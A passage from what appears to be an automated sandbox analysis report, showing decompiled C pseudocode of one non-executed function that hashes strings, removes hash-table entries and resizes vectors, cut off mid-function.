                                                                                                                                                                    • API String ID: 4275171209-0
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Non-executed Functions

                                                                                                                                                                    C-Code - Quality: 77%
                                                                                                                                                                    			E0046F4B0(signed int __ebx, void* __edi) {
                                                                                                                                                                    				void* __esi;
                                                                                                                                                                    				signed int _t305;
                                                                                                                                                                    				signed int _t307;
                                                                                                                                                                    				signed int _t310;
                                                                                                                                                                    				signed int _t311;
                                                                                                                                                                    				signed int _t313;
                                                                                                                                                                    				signed int _t317;
                                                                                                                                                                    				signed int _t321;
                                                                                                                                                                    				signed int _t333;
                                                                                                                                                                    				signed int _t336;
                                                                                                                                                                    				signed int _t341;
                                                                                                                                                                    				signed int _t343;
                                                                                                                                                                    				void* _t347;
                                                                                                                                                                    				signed int _t352;
				intOrPtr* _t357;
				intOrPtr _t360;
				signed int _t363;
				signed int _t371;
				void* _t375;
				signed int _t382;
				signed int _t399;
				void* _t403;
				signed int _t410;
				signed int _t419;
				void* _t423;
				signed int _t430;
				signed int _t448;
				signed int _t450;
				signed int _t451;
				void* _t453;
				signed int _t454;
				signed int _t457;
				signed int _t465;
				signed int _t467;
				signed int _t468;
				void* _t470;
				signed int _t471;
				signed int _t474;
				signed int _t481;
				void* _t482;
				void* _t495;
				void* _t505;
				void* _t506;
				signed int _t509;
				void* _t510;
				void* _t511;
				void* _t517;
				unsigned int _t520;
				signed int _t522;
				void* _t535;
				unsigned int _t538;
				signed int _t540;
				intOrPtr* _t549;
				void* _t551;
				unsigned int _t554;
				signed int _t556;
				void* _t565;
				unsigned int _t568;
				signed int _t570;
				signed int _t582;
				intOrPtr* _t583;
				signed int _t584;
				signed int _t585;
				unsigned int _t587;
				intOrPtr _t588;
				intOrPtr* _t589;
				signed int _t596;
				intOrPtr* _t597;
				signed int _t598;
				signed int _t599;
				unsigned int _t601;
				intOrPtr _t602;
				intOrPtr* _t603;
				signed int _t612;
				signed int _t616;
				signed int _t621;
				signed int _t624;
				signed int _t630;
				signed int _t635;
				signed int _t637;
				signed int _t645;
				signed int _t650;
				signed int _t652;
				signed int _t660;
				void* _t662;
				intOrPtr* _t664;
				void* _t665;
				void* _t668;
				unsigned int _t670;
				signed int _t671;
				signed int _t672;
				void* _t675;
				unsigned int _t678;
				signed int _t681;
				signed int _t682;
				void* _t685;
				unsigned int _t687;
				signed int _t688;
				signed int _t689;
				void* _t692;
				unsigned int _t694;
				signed int _t695;
				signed int _t696;
				void* _t697;
				void* _t698;
				signed int _t700;
				signed int _t701;
				intOrPtr* _t703;
				signed int _t704;
				signed int _t705;
				signed int _t706;
				void* _t709;
				unsigned int _t711;
				signed int _t714;
				void* _t715;
				unsigned int _t716;
				void* _t718;
				unsigned int _t720;
				signed int _t721;
				void* _t722;
				intOrPtr _t724;
				unsigned int _t726;
				signed int _t729;
				void* _t730;
				unsigned int _t733;
				signed int _t736;
				void* _t737;
				signed int _t740;
				signed int _t742;
				intOrPtr _t745;
				void* _t747;
				signed int _t748;
				signed int _t749;
				void* _t751;

				_t480 = __ebx;
				_push(0xffffffff);
				_push(0x513070);
				_push( *[fs:0x0]);
				_t748 = _t747 - 0x20;
				_t305 =  *0x5596fc; // 0x9d48295
				 *(_t748 + 0x18) = _t305 ^ _t748;
				_push(__ebx);
				_push(__edi);
				_t307 =  *0x5596fc; // 0x9d48295
				_push(_t307 ^ _t748);
				 *[fs:0x0] = _t748 + 0x34;
				_t745 =  *((intOrPtr*)(_t748 + 0x44));
				 *(_t748 + 0x14) = 0;
				_t310 =  *(_t745 + 0x114);
				 *(_t748 + 0x18) = _t310;
				_t311 =  *(_t310 - 0xc);
				 *(_t748 + 0x14) = _t311;
				_t754 = _t311 -  *(_t745 + 0x124) -  *(_t745 + 0x120) >> 2;
				if(_t311 <  *(_t745 + 0x124) -  *(_t745 + 0x120) >> 2) {
					_t698 = _t745 + 0xa8;
					goto L3;
					do {
						L4:
						_t596 =  *_t596;
					} while (_t596 != _t645);
					L5:
					_t597 =  *((intOrPtr*)(_t698 + 4));
					 *(_t748 + 0x24) = _t465;
					if(_t465 !=  *_t597 || _t645 != _t597) {
						__eflags = _t465 - _t645;
						while(__eflags != 0) {
							_t742 =  *(_t748 + 0x24);
							 *(_t748 + 0x24) =  *_t742;
							_t650 =  *(_t742 + 8);
							_t468 = _t650;
							_t480 = _t468 + 1;
							do {
								_t598 =  *_t468;
								_t468 = _t468 + 1;
								__eflags = _t598;
							} while (_t598 != 0);
							_t470 = _t468 - _t480 + _t650;
							_t599 = 0x811c9dc5;
							__eflags = _t650 - _t470;
							while(_t650 != _t470) {
								_t480 =  *_t650 & 0x000000ff;
								_t650 = _t650 + 1;
								_t599 = _t599 * 0x01000193 ^ _t480;
								__eflags = _t650 - _t470;
							}
							_t471 = L004F2B82(_t599 & 0x7fffffff, 0x1f31d);
							_t748 = _t748 + 8;
							_t652 = _t650 * 0x41a7 - _t471 * 0xb14;
							__eflags = _t652;
							if(_t652 < 0) {
								_t652 = _t652 + 0x7fffffff;
								__eflags = _t652;
							}
							_t601 =  *(_t698 + 0x20);
							_t474 = _t601 & _t652;
							__eflags =  *((intOrPtr*)(_t698 + 0x24)) - _t474;
							if( *((intOrPtr*)(_t698 + 0x24)) <= _t474) {
								_t474 = _t474 + (_t652 | 0xffffffff) - (_t601 >> 1);
								__eflags = _t474;
							}
							_t602 =  *((intOrPtr*)(_t698 + 0x10));
							__eflags =  *((intOrPtr*)(_t602 + 4 + _t474 * 8)) - _t742;
							_t603 = _t602 + _t474 * 8;
							if( *((intOrPtr*)(_t602 + 4 + _t474 * 8)) != _t742) {
								__eflags =  *_t603 - _t742;
                                                                                                                                                                    								if( *_t603 == _t742) {
                                                                                                                                                                    									 *_t603 =  *_t742;
                                                                                                                                                                    								}
                                                                                                                                                                    							} else {
                                                                                                                                                                    								__eflags =  *_t603 - _t742;
                                                                                                                                                                    								if( *_t603 != _t742) {
                                                                                                                                                                    									 *((intOrPtr*)(_t603 + 4)) =  *((intOrPtr*)(_t742 + 4));
                                                                                                                                                                    								} else {
                                                                                                                                                                    									 *_t603 =  *((intOrPtr*)(_t698 + 4));
                                                                                                                                                                    									 *((intOrPtr*)( *((intOrPtr*)(_t698 + 0x10)) + 4 + _t474 * 8)) =  *((intOrPtr*)(_t698 + 4));
                                                                                                                                                                    								}
                                                                                                                                                                    							}
                                                                                                                                                                    							__eflags = _t742 -  *((intOrPtr*)(_t698 + 4));
                                                                                                                                                                    							if(_t742 !=  *((intOrPtr*)(_t698 + 4))) {
                                                                                                                                                                    								 *((intOrPtr*)( *((intOrPtr*)(_t742 + 4)))) =  *_t742;
                                                                                                                                                                    								_push(_t742);
                                                                                                                                                                    								 *((intOrPtr*)( *_t742 + 4)) =  *((intOrPtr*)(_t742 + 4));
                                                                                                                                                                    								L004EEDBE();
                                                                                                                                                                    								_t748 = _t748 + 4;
                                                                                                                                                                    								_t45 = _t698 + 8;
                                                                                                                                                                    								 *_t45 =  *(_t698 + 8) - 1;
                                                                                                                                                                    								__eflags =  *_t45;
                                                                                                                                                                    							}
                                                                                                                                                                    							__eflags =  *(_t748 + 0x24) -  *(_t748 + 0x20);
                                                                                                                                                                    						}
                                                                                                                                                                    					} else {
                                                                                                                                                                    						L00480E50(_t480, _t698);
                                                                                                                                                                    					}
                                                                                                                                                                    					_t467 =  *(_t748 + 0x14) + 1;
                                                                                                                                                                    					 *(_t748 + 0x14) = _t467;
                                                                                                                                                                    					if(_t467 <  *(_t745 + 0x124) -  *(_t745 + 0x120) >> 2) {
                                                                                                                                                                    						_t311 =  *(_t748 + 0x14);
                                                                                                                                                                    						L3:
                                                                                                                                                                    						E004804B0( *(_t745 + 0x120) + _t311 * 4, _t748 + 0x1c, _t754, _t698, _t748 + 0x1c);
                                                                                                                                                                    						_t465 =  *(_t748 + 0x1c);
                                                                                                                                                                    						_t645 =  *(_t748 + 0x20);
                                                                                                                                                                    						_t596 = _t465;
                                                                                                                                                                    						if(_t465 != _t645) {
                                                                                                                                                                    							goto L4;
                                                                                                                                                                    						}
                                                                                                                                                                    						goto L5;
                                                                                                                                                                    					}
                                                                                                                                                                    				}
                                                                                                                                                                    				_t313 =  *( *(_t748 + 0x18) - 8);
                                                                                                                                                                    				 *(_t748 + 0x24) = _t313;
                                                                                                                                                                    				_t760 = _t313 -  *(_t745 + 0x134) -  *(_t745 + 0x130) >> 2;
                                                                                                                                                                    				if(_t313 <  *(_t745 + 0x134) -  *(_t745 + 0x130) >> 2) {
                                                                                                                                                                    					_t697 = _t745 + 0xd4;
                                                                                                                                                                    					do {
                                                                                                                                                                    						E004804B0( *(_t745 + 0x130) +  *(_t748 + 0x24) * 4, _t748 + 0x1c, _t760, _t697, _t748 + 0x1c);
                                                                                                                                                                    						_t448 =  *(_t748 + 0x1c);
                                                                                                                                                                    						_t630 =  *(_t748 + 0x20);
                                                                                                                                                                    						_t582 = _t448;
                                                                                                                                                                    						if(_t448 != _t630) {
                                                                                                                                                                    							do {
                                                                                                                                                                    								_t582 =  *_t582;
                                                                                                                                                                    							} while (_t582 != _t630);
                                                                                                                                                                    						}
                                                                                                                                                                    						_t583 =  *((intOrPtr*)(_t697 + 4));
                                                                                                                                                                    						 *(_t748 + 0x14) = _t448;
                                                                                                                                                                    						if(_t448 !=  *_t583 || _t630 != _t583) {
                                                                                                                                                                    							__eflags = _t448 - _t630;
                                                                                                                                                                    							while(__eflags != 0) {
                                                                                                                                                                    								_t740 =  *(_t748 + 0x14);
                                                                                                                                                                    								 *(_t748 + 0x14) =  *_t740;
                                                                                                                                                                    								_t635 =  *(_t740 + 8);
                                                                                                                                                                    								_t451 = _t635;
                                                                                                                                                                    								_t480 = _t451 + 1;
                                                                                                                                                                    								do {
                                                                                                                                                                    									_t584 =  *_t451;
                                                                                                                                                                    									_t451 = _t451 + 1;
                                                                                                                                                                    									__eflags = _t584;
                                                                                                                                                                    								} while (_t584 != 0);
                                                                                                                                                                    								_t453 = _t451 - _t480 + _t635;
                                                                                                                                                                    								_t585 = 0x811c9dc5;
                                                                                                                                                                    								__eflags = _t635 - _t453;
                                                                                                                                                                    								while(_t635 != _t453) {
                                                                                                                                                                    									_t480 =  *_t635 & 0x000000ff;
                                                                                                                                                                    									_t635 = _t635 + 1;
                                                                                                                                                                    									_t585 = _t585 * 0x01000193 ^ _t480;
                                                                                                                                                                    									__eflags = _t635 - _t453;
                                                                                                                                                                    								}
                                                                                                                                                                    								_t454 = L004F2B82(_t585 & 0x7fffffff, 0x1f31d);
                                                                                                                                                                    								_t748 = _t748 + 8;
                                                                                                                                                                    								_t637 = _t635 * 0x41a7 - _t454 * 0xb14;
                                                                                                                                                                    								__eflags = _t637;
                                                                                                                                                                    								if(_t637 < 0) {
                                                                                                                                                                    									_t637 = _t637 + 0x7fffffff;
                                                                                                                                                                    									__eflags = _t637;
                                                                                                                                                                    								}
                                                                                                                                                                    								_t587 =  *(_t697 + 0x20);
                                                                                                                                                                    								_t457 = _t587 & _t637;
                                                                                                                                                                    								__eflags =  *((intOrPtr*)(_t697 + 0x24)) - _t457;
                                                                                                                                                                    								if( *((intOrPtr*)(_t697 + 0x24)) <= _t457) {
                                                                                                                                                                    									_t457 = _t457 + (_t637 | 0xffffffff) - (_t587 >> 1);
                                                                                                                                                                    									__eflags = _t457;
                                                                                                                                                                    								}
                                                                                                                                                                    								_t588 =  *((intOrPtr*)(_t697 + 0x10));
                                                                                                                                                                    								__eflags =  *((intOrPtr*)(_t588 + 4 + _t457 * 8)) - _t740;
                                                                                                                                                                    								_t589 = _t588 + _t457 * 8;
                                                                                                                                                                    								if( *((intOrPtr*)(_t588 + 4 + _t457 * 8)) != _t740) {
                                                                                                                                                                    									__eflags =  *_t589 - _t740;
                                                                                                                                                                    									if( *_t589 == _t740) {
                                                                                                                                                                    										 *_t589 =  *_t740;
                                                                                                                                                                    									}
                                                                                                                                                                    								} else {
                                                                                                                                                                    									__eflags =  *_t589 - _t740;
                                                                                                                                                                    									if( *_t589 != _t740) {
                                                                                                                                                                    										 *((intOrPtr*)(_t589 + 4)) =  *((intOrPtr*)(_t740 + 4));
                                                                                                                                                                    									} else {
                                                                                                                                                                    										 *_t589 =  *((intOrPtr*)(_t697 + 4));
                                                                                                                                                                    										 *((intOrPtr*)( *((intOrPtr*)(_t697 + 0x10)) + 4 + _t457 * 8)) =  *((intOrPtr*)(_t697 + 4));
                                                                                                                                                                    									}
                                                                                                                                                                    								}
                                                                                                                                                                    								__eflags = _t740 -  *((intOrPtr*)(_t697 + 4));
                                                                                                                                                                    								if(_t740 !=  *((intOrPtr*)(_t697 + 4))) {
                                                                                                                                                                    									 *((intOrPtr*)( *((intOrPtr*)(_t740 + 4)))) =  *_t740;
                                                                                                                                                                    									_push(_t740);
                                                                                                                                                                    									 *((intOrPtr*)( *_t740 + 4)) =  *((intOrPtr*)(_t740 + 4));
                                                                                                                                                                    									L004EEDBE();
                                                                                                                                                                    									_t748 = _t748 + 4;
                                                                                                                                                                    									_t92 = _t697 + 8;
                                                                                                                                                                    									 *_t92 =  *(_t697 + 8) - 1;
                                                                                                                                                                    									__eflags =  *_t92;
                                                                                                                                                                    								}
                                                                                                                                                                    								__eflags =  *(_t748 + 0x14) -  *(_t748 + 0x20);
                                                                                                                                                                    							}
                                                                                                                                                                    						} else {
                                                                                                                                                                    							L00480E50(_t480, _t697);
                                                                                                                                                                    						}
                                                                                                                                                                    						_t450 =  *(_t748 + 0x24) + 1;
                                                                                                                                                                    						 *(_t748 + 0x24) = _t450;
                                                                                                                                                                    					} while (_t450 <  *(_t745 + 0x134) -  *(_t745 + 0x130) >> 2);
                                                                                                                                                                    				}
                                                                                                                                                                    				_t660 =  *( *(_t748 + 0x18) - 4);
                                                                                                                                                                    				if(_t660 <  *((intOrPtr*)(_t745 + 0x144)) -  *((intOrPtr*)(_t745 + 0x140)) >> 3) {
                                                                                                                                                                    					_t495 = _t745 + 0x100;
                                                                                                                                                                    					do {
                                                                                                                                                                    						E004811C0( *((intOrPtr*)(_t745 + 0x140)) + _t660 * 8, _t495, _t748 + 0x1c);
                                                                                                                                                                    						E00480650(_t495, _t748 + 0x1c,  *(_t748 + 0x1c),  *(_t748 + 0x20));
                                                                                                                                                                    						_t660 = _t660 + 1;
                                                                                                                                                                    					} while (_t660 <  *((intOrPtr*)(_t745 + 0x144)) -  *((intOrPtr*)(_t745 + 0x140)) >> 3);
                                                                                                                                                                    				}
                                                                                                                                                                    				_t505 =  *(_t745 + 0x124);
                                                                                                                                                                    				_t700 =  *(_t745 + 0x120);
                                                                                                                                                                    				_t610 =  *( *(_t748 + 0x18) - 0xc);
                                                                                                                                                                    				_t317 = _t505 - _t700 >> 2;
                                                                                                                                                                    				 *(_t748 + 0x14) = _t610;
                                                                                                                                                                    				if(_t317 <= _t610) {
                                                                                                                                                                    					if(__eflags >= 0) {
                                                                                                                                                                    						goto L81;
                                                                                                                                                                    					} else {
                                                                                                                                                                    						_t565 = _t610 - _t317;
                                                                                                                                                                    						__eflags = 0x3fffffff - _t565 - _t317;
                                                                                                                                                                    						if(0x3fffffff - _t565 < _t317) {
                                                                                                                                                                    							_t317 = E004EE38E("vector<T> too long");
                                                                                                                                                                    						}
                                                                                                                                                                    						_t419 = _t317 + _t565;
                                                                                                                                                                    						_t568 =  *((intOrPtr*)(_t745 + 0x128)) - _t700 >> 2;
                                                                                                                                                                    						__eflags = _t419 - _t568;
                                                                                                                                                                    						if(_t419 <= _t568) {
                                                                                                                                                                    							L78:
                                                                                                                                                                    							_t692 =  *(_t745 + 0x124);
                                                                                                                                                                    							_t570 = _t610 - (_t692 -  *(_t745 + 0x120) >> 2);
                                                                                                                                                                    							__eflags = _t570;
                                                                                                                                                                    							if(_t570 != 0) {
                                                                                                                                                                    								__eflags = 0;
                                                                                                                                                                    								memset(_t692, 0, _t570 << 2);
                                                                                                                                                                    								_t748 = _t748 + 0xc;
                                                                                                                                                                    							}
                                                                                                                                                                    							_t423 =  *(_t745 + 0x124);
                                                                                                                                                                    							_t624 = _t610 - (_t423 -  *(_t745 + 0x120) >> 2);
                                                                                                                                                                    							__eflags = _t624;
                                                                                                                                                                    							 *(_t745 + 0x124) = _t423 + _t624 * 4;
                                                                                                                                                                    							goto L81;
                                                                                                                                                                    						} else {
                                                                                                                                                                    							_t694 = _t568;
                                                                                                                                                                    							_t733 = _t694 >> 1;
                                                                                                                                                                    							__eflags = 0x3fffffff - _t733 - _t694;
                                                                                                                                                                    							if(0x3fffffff - _t733 >= _t694) {
                                                                                                                                                                    								_t695 = _t694 + _t733;
                                                                                                                                                                    								__eflags = _t695;
                                                                                                                                                                    							} else {
                                                                                                                                                                    								_t695 = 0;
                                                                                                                                                                    							}
                                                                                                                                                                    							__eflags = _t695 - _t419;
                                                                                                                                                                    							if(_t695 < _t419) {
                                                                                                                                                                    								_t695 = _t419;
                                                                                                                                                                    							}
                                                                                                                                                                    							__eflags = _t695 - 0x3fffffff;
                                                                                                                                                                    							if(_t695 > 0x3fffffff) {
                                                                                                                                                                    								E004EE38E("vector<T> too long");
                                                                                                                                                                    							}
                                                                                                                                                                    							__eflags = _t568 - _t695;
                                                                                                                                                                    							if(_t568 >= _t695) {
                                                                                                                                                                    								goto L78;
                                                                                                                                                                    							} else {
                                                                                                                                                                    								_t494 = 0;
                                                                                                                                                                    								__eflags = _t695;
                                                                                                                                                                    								if(__eflags == 0) {
                                                                                                                                                                    									L75:
                                                                                                                                                                    									E004EF0C0(_t494,  *(_t745 + 0x120), ( *(_t745 + 0x124) -  *(_t745 + 0x120) >> 2) * 4);
                                                                                                                                                                    									_t430 =  *(_t745 + 0x120);
                                                                                                                                                                    									_t748 = _t748 + 0xc;
                                                                                                                                                                    									_t736 =  *(_t745 + 0x124) - _t430 >> 2;
                                                                                                                                                                    									__eflags = _t430;
                                                                                                                                                                    									if(_t430 != 0) {
                                                                                                                                                                    										_push(_t430);
                                                                                                                                                                    										L004EEDBE();
                                                                                                                                                                    										_t748 = _t748 + 4;
                                                                                                                                                                    									}
                                                                                                                                                                    									_t610 =  *(_t748 + 0x14);
                                                                                                                                                                    									 *((intOrPtr*)(_t745 + 0x128)) = _t494 + _t695 * 4;
                                                                                                                                                                    									 *(_t745 + 0x124) = _t494 + _t736 * 4;
                                                                                                                                                                    									 *(_t745 + 0x120) = _t494;
                                                                                                                                                                    									goto L78;
                                                                                                                                                                    								} else {
                                                                                                                                                                    									_push(_t695 * 4);
                                                                                                                                                                    									_t494 = L004EF8DA(0, _t568, _t610, _t695, _t733, __eflags);
                                                                                                                                                                    									_t748 = _t748 + 4;
                                                                                                                                                                    									__eflags = _t494;
                                                                                                                                                                    									if(_t494 == 0) {
                                                                                                                                                                    										 *(_t748 + 0x20) = 0;
                                                                                                                                                                    										 *(_t748 + 0x1c) = 0x52fd98;
                                                                                                                                                                    										_t701 = _t748 + 0x1c;
                                                                                                                                                                    										 *((intOrPtr*)(_t748 + 0x3c)) = 1;
                                                                                                                                                                    										_t321 = E00404190(_t701);
                                                                                                                                                                    										goto L85;
                                                                                                                                                                    									} else {
                                                                                                                                                                    										goto L75;
                                                                                                                                                                    									}
                                                                                                                                                                    								}
                                                                                                                                                                    							}
                                                                                                                                                                    						}
                                                                                                                                                                    					}
                                                                                                                                                                    				} else {
                                                                                                                                                                    					_t737 = _t700 + _t610 * 4;
                                                                                                                                                                    					if(_t737 != _t505) {
                                                                                                                                                                    						_t696 = (_t505 - _t505 >> 2) * 4;
                                                                                                                                                                    						E004EF0C0(_t737, _t505, _t696);
                                                                                                                                                                    						_t748 = _t748 + 0xc;
                                                                                                                                                                    						 *(_t745 + 0x124) = _t737 + _t696;
                                                                                                                                                                    					}
                                                                                                                                                                    					L81:
                                                                                                                                                                    					_t610 =  *( *(_t748 + 0x18) - 8);
                                                                                                                                                                    					_t506 =  *(_t745 + 0x134);
                                                                                                                                                                    					_t701 =  *(_t745 + 0x130);
                                                                                                                                                                    					_t321 = _t506 - _t701 >> 2;
                                                                                                                                                                    					 *(_t748 + 0x14) = _t610;
                                                                                                                                                                    					if(_t321 <= _t610) {
                                                                                                                                                                    						L85:
                                                                                                                                                                    						if(__eflags >= 0) {
                                                                                                                                                                    							goto L105;
                                                                                                                                                                    						} else {
                                                                                                                                                                    							_t551 = _t610 - _t321;
                                                                                                                                                                    							__eflags = 0x3fffffff - _t551 - _t321;
                                                                                                                                                                    							if(0x3fffffff - _t551 < _t321) {
                                                                                                                                                                    								_t321 = E004EE38E("vector<T> too long");
                                                                                                                                                                    							}
                                                                                                                                                                    							_t399 = _t321 + _t551;
                                                                                                                                                                    							_t554 =  *((intOrPtr*)(_t745 + 0x138)) - _t701 >> 2;
                                                                                                                                                                    							__eflags = _t399 - _t554;
                                                                                                                                                                    							if(_t399 <= _t554) {
                                                                                                                                                                    								L102:
                                                                                                                                                                    								_t685 =  *(_t745 + 0x134);
                                                                                                                                                                    								_t556 = _t610 - (_t685 -  *(_t745 + 0x130) >> 2);
                                                                                                                                                                    								__eflags = _t556;
                                                                                                                                                                    								if(_t556 != 0) {
                                                                                                                                                                    									__eflags = 0;
                                                                                                                                                                    									memset(_t685, 0, _t556 << 2);
                                                                                                                                                                    									_t748 = _t748 + 0xc;
                                                                                                                                                                    								}
                                                                                                                                                                    								_t403 =  *(_t745 + 0x134);
                                                                                                                                                                    								_t621 = _t610 - (_t403 -  *(_t745 + 0x130) >> 2);
                                                                                                                                                                    								__eflags = _t621;
                                                                                                                                                                    								 *(_t745 + 0x134) = _t403 + _t621 * 4;
                                                                                                                                                                    								goto L105;
                                                                                                                                                                    							} else {
                                                                                                                                                                    								_t687 = _t554;
                                                                                                                                                                    								_t726 = _t687 >> 1;
                                                                                                                                                                    								__eflags = 0x3fffffff - _t726 - _t687;
                                                                                                                                                                    								if(0x3fffffff - _t726 >= _t687) {
                                                                                                                                                                    									_t688 = _t687 + _t726;
                                                                                                                                                                    									__eflags = _t688;
                                                                                                                                                                    								} else {
                                                                                                                                                                    									_t688 = 0;
                                                                                                                                                                    								}
                                                                                                                                                                    								__eflags = _t688 - _t399;
                                                                                                                                                                    								if(_t688 < _t399) {
                                                                                                                                                                    									_t688 = _t399;
                                                                                                                                                                    								}
                                                                                                                                                                    								__eflags = _t688 - 0x3fffffff;
                                                                                                                                                                    								if(_t688 > 0x3fffffff) {
                                                                                                                                                                    									E004EE38E("vector<T> too long");
                                                                                                                                                                    								}
                                                                                                                                                                    								__eflags = _t554 - _t688;
                                                                                                                                                                    								if(_t554 >= _t688) {
                                                                                                                                                                    									goto L102;
                                                                                                                                                                    								} else {
                                                                                                                                                                    									__eflags = _t688;
                                                                                                                                                                    									if(__eflags == 0) {
                                                                                                                                                                    										L99:
                                                                                                                                                                    										E004EF0C0(0,  *(_t745 + 0x130), ( *(_t745 + 0x134) -  *(_t745 + 0x130) >> 2) * 4);
                                                                                                                                                                    										_t410 =  *(_t745 + 0x130);
                                                                                                                                                                    										_t748 = _t748 + 0xc;
                                                                                                                                                                    										_t729 =  *(_t745 + 0x134) - _t410 >> 2;
                                                                                                                                                                    										__eflags = _t410;
                                                                                                                                                                    										if(_t410 != 0) {
                                                                                                                                                                    											_push(_t410);
                                                                                                                                                                    											L004EEDBE();
                                                                                                                                                                    											_t748 = _t748 + 4;
                                                                                                                                                                    										}
                                                                                                                                                                    										_t610 =  *(_t748 + 0x14);
                                                                                                                                                                    										 *((intOrPtr*)(_t745 + 0x138)) = 0 + _t688 * 4;
                                                                                                                                                                    										 *(_t745 + 0x134) = 0 + _t729 * 4;
                                                                                                                                                                    										 *(_t745 + 0x130) = 0;
                                                                                                                                                                    										goto L102;
                                                                                                                                                                    									} else {
                                                                                                                                                                    										_push(_t688 * 4);
                                                                                                                                                                    										_t481 = L004EF8DA(0, _t688 * 4, _t610, _t688, _t726, __eflags);
                                                                                                                                                                    										_t749 = _t748 + 4;
                                                                                                                                                                    										__eflags = _t481;
                                                                                                                                                                    										if(_t481 == 0) {
                                                                                                                                                                    											 *(_t749 + 0x20) = 0;
                                                                                                                                                                    											 *(_t749 + 0x1c) = 0x52fd98;
                                                                                                                                                                    											_t705 = _t749 + 0x1c;
                                                                                                                                                                    											 *((intOrPtr*)(_t749 + 0x3c)) = 2;
                                                                                                                                                                    											_t333 = E00404190(_t705);
                                                                                                                                                                    											goto L119;
                                                                                                                                                                    										} else {
                                                                                                                                                                    											goto L99;
                                                                                                                                                                    										}
                                                                                                                                                                    									}
                                                                                                                                                                    								}
                                                                                                                                                                    							}
                                                                                                                                                                    						}
                                                                                                                                                                    					} else {
                                                                                                                                                                    						_t730 = _t701 + _t610 * 4;
                                                                                                                                                                    						if(_t730 != _t506) {
                                                                                                                                                                    							_t689 = (_t506 - _t506 >> 2) * 4;
                                                                                                                                                                    							E004EF0C0(_t730, _t506, _t689);
                                                                                                                                                                    							_t748 = _t748 + 0xc;
                                                                                                                                                                    							 *(_t745 + 0x134) = _t730 + _t689;
                                                                                                                                                                    						}
                                                                                                                                                                    						L105:
                                                                                                                                                                    						_t481 =  *(_t748 + 0x18);
                                                                                                                                                                    						L0047FD50( *((intOrPtr*)(_t481 - 4)), _t745 + 0x140);
                                                                                                                                                                    						E00482410( *(_t745 + 0x68) +  *(_t481 - 0x1c) * 4,  *(_t745 + 0x6c));
                                                                                                                                                                    						_t662 =  *(_t745 + 0x7c);
                                                                                                                                                                    						_t703 =  *(_t745 + 0x78) +  *(_t481 - 0x18) * 4;
                                                                                                                                                                    						_t749 = _t748 + 8;
                                                                                                                                                                    						while(_t703 != _t662) {
                                                                                                                                                                    							_t549 =  *_t703;
                                                                                                                                                                    							_t703 = _t703 + 4;
                                                                                                                                                                    							if(_t549 != 0) {
                                                                                                                                                                    								 *((intOrPtr*)( *((intOrPtr*)( *_t549))))(1);
                                                                                                                                                                    							}
                                                                                                                                                                    						}
                                                                                                                                                                    						_t509 =  *(_t745 + 0x8c);
                                                                                                                                                                    						_t664 =  *((intOrPtr*)(_t745 + 0x88)) +  *(_t481 - 0x14) * 4;
                                                                                                                                                                    						 *(_t749 + 0x14) = _t509;
                                                                                                                                                                    						while(_t664 != _t509) {
                                                                                                                                                                    							_t724 =  *_t664;
                                                                                                                                                                    							_t664 = _t664 + 4;
                                                                                                                                                                    							if(_t724 != 0) {
                                                                                                                                                                    								E0046F240(_t724);
                                                                                                                                                                    								_push(_t724);
                                                                                                                                                                    								L004EEDBE();
                                                                                                                                                                    								_t509 =  *(_t749 + 0x18);
                                                                                                                                                                    								_t749 = _t749 + 4;
                                                                                                                                                                    							}
                                                                                                                                                                    						}
                                                                                                                                                                    						_t704 =  *(_t481 - 0x10);
                                                                                                                                                                    						while(_t704 <  *((intOrPtr*)(_t745 + 0x9c)) -  *((intOrPtr*)(_t745 + 0x98)) >> 2) {
                                                                                                                                                                    							_push( *((intOrPtr*)( *((intOrPtr*)(_t745 + 0x98)) + _t704 * 4)));
                                                                                                                                                                    							L004EEDBE();
                                                                                                                                                                    							_t704 = _t704 + 1;
                                                                                                                                                                    							_t749 = _t749 + 4;
                                                                                                                                                                    						}
                                                                                                                                                                    						_t510 =  *(_t745 + 0x6c);
                                                                                                                                                                    						_t705 =  *(_t745 + 0x68);
                                                                                                                                                                    						_t610 =  *(_t481 - 0x1c);
                                                                                                                                                                    						_t333 = _t510 - _t705 >> 2;
                                                                                                                                                                    						 *(_t749 + 0x14) = _t610;
                                                                                                                                                                    						if(_t333 <= _t610) {
                                                                                                                                                                    							L119:
                                                                                                                                                                    							if(__eflags >= 0) {
                                                                                                                                                                    								goto L140;
                                                                                                                                                                    							} else {
                                                                                                                                                                    								_t535 = _t610 - _t333;
                                                                                                                                                                    								__eflags = 0x3fffffff - _t535 - _t333;
                                                                                                                                                                    								if(0x3fffffff - _t535 < _t333) {
                                                                                                                                                                    									_t333 = E004EE38E("vector<T> too long");
                                                                                                                                                                    								}
                                                                                                                                                                    								_t371 = _t333 + _t535;
                                                                                                                                                                    								_t538 =  *((intOrPtr*)(_t745 + 0x70)) - _t705 >> 2;
                                                                                                                                                                    								__eflags = _t371 - _t538;
                                                                                                                                                                    								if(_t371 <= _t538) {
                                                                                                                                                                    									L137:
                                                                                                                                                                    									_t675 =  *(_t745 + 0x6c);
                                                                                                                                                                    									_t540 = _t610 - (_t675 -  *(_t745 + 0x68) >> 2);
                                                                                                                                                                    									__eflags = _t540;
                                                                                                                                                                    									if(_t540 != 0) {
                                                                                                                                                                    										__eflags = 0;
                                                                                                                                                                    										memset(_t675, 0, _t540 << 2);
                                                                                                                                                                    										_t749 = _t749 + 0xc;
                                                                                                                                                                    									}
                                                                                                                                                                    									_t375 =  *(_t745 + 0x6c);
                                                                                                                                                                    									_t616 = _t610 - (_t375 -  *(_t745 + 0x68) >> 2);
                                                                                                                                                                    									__eflags = _t616;
                                                                                                                                                                    									 *(_t745 + 0x6c) = _t375 + _t616 * 4;
                                                                                                                                                                    									goto L140;
                                                                                                                                                                    								} else {
                                                                                                                                                                    									_t720 = _t538;
                                                                                                                                                                    									_t678 = _t720 >> 1;
                                                                                                                                                                    									__eflags = 0x3fffffff - _t678 - _t720;
                                                                                                                                                                    									if(0x3fffffff - _t678 >= _t720) {
                                                                                                                                                                    										_t721 = _t720 + _t678;
                                                                                                                                                                    										__eflags = _t721;
                                                                                                                                                                    									} else {
                                                                                                                                                                    										_t721 = 0;
                                                                                                                                                                    									}
                                                                                                                                                                    									__eflags = _t721 - _t371;
                                                                                                                                                                    									if(_t721 < _t371) {
                                                                                                                                                                    										_t721 = _t371;
                                                                                                                                                                    									}
                                                                                                                                                                    									__eflags = _t721 - 0x3fffffff;
                                                                                                                                                                    									if(_t721 > 0x3fffffff) {
